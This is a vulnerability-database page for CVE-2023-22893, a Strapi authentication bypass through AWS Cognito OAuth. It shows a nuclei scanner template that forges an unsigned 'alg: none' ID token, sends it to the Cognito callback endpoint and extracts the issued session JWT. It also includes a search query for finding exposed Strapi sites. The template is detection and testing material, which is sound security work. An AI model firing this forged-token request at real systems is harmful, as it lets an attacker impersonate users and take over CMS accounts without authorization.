Lucene search
K

Strapi Versions <=4.5.6 - Authentication Bypass

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 48 Views

Strapi <=4.5.6 Authentication Bypass CVE-2023-22893, allows OAuth flow access token verification bypass for AWS Cognito

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-22893
18 Apr 202309:12
circl
CNNVD
Strapi 授权问题漏洞
19 Apr 202300:00
cnnvd
CVE
CVE-2023-22893
19 Apr 202300:00
cve
Cvelist
CVE-2023-22893
19 Apr 202300:00
cvelist
Github Security Blog
Strapi does not verify the access or ID tokens issued during the OAuth flow
19 Apr 202318:33
github
NVD
CVE-2023-22893
19 Apr 202316:15
nvd
OSV
GHSA-583X-23H9-F5W7 Strapi does not verify the access or ID tokens issued during the OAuth flow
19 Apr 202318:33
osv
Prion
Authentication flaw
19 Apr 202316:15
prion
Positive Technologies
PT-2023-18757 · Amazon · Aws Cognito
18 Apr 202300:00
ptsecurity
RedhatCVE
CVE-2023-22893
23 May 202503:16
redhatcve
Rows per page
id: CVE-2023-22893

info:
  name: Strapi Versions <=4.5.6 - Authentication Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Strapi through 4.5.5 does not verify the access or ID tokens issued during the OAuth flow when the AWS Cognito login provider is used for authentication. A remote attacker could forge an ID token that is signed using the 'None' type algorithm to bypass authentication and impersonate any user that use AWS Cognito for authentication.
  impact: |
    Unauthenticated attackers can forge JWT tokens using the "None" algorithm to bypass AWS Cognito authentication and impersonate any Strapi user, gaining unauthorized access to CMS content and administrative functions.
  remediation: |
    Update Strapi to version 4.5.6 or later which properly verifies access and ID tokens issued during OAuth flow with AWS Cognito login provider.
  reference:
    - https://www.ghostccamm.com/blog/multi_strapi_vulns
    - https://github.com/strapi/strapi/releases
    - https://github.com/ARPSyndicate/cvemon
    - https://nvd.nist.gov/vuln/detail/CVE-2023-22893
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-22893
    cwe-id: CWE-287
    epss-score: 0.04158
    epss-percentile: 0.89625
    cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: strapi
    product: strapi
    fofa-query: app="strapi-Headless-CMS"
  tags: cve,cve2023,strapi,authenticated,aws,cognito,vkev,vuln

variables:
  email: "{{email}}"
  payload: '{"cognito:username":"{{to_lower(rand_text_alpha(10))}}","email":"{{email}}"}'

http:
  - raw:
      - |
        GET /api/auth/cognito/callback?access_token={{to_lower(rand_text_alpha(8))}}&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.{{base64(payload)}}. HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"provider":'
          - '"confirmed":'
        condition: and

      - type: word
        part: content_type
        words:
          - application/json

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body
        name: token
        json:
          - ".jwt"
# digest: 4a0a00473045022100b2ffd04bd0edf7be4eb8642cf7a1420e2527a9f72525e8d2ea255e143b4af91702201311624481b5a96defc04703bca134aa5a0b71fc91aff528157ad82f6c979524:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.5 - 8.2
EPSS0.04158
SSVC
48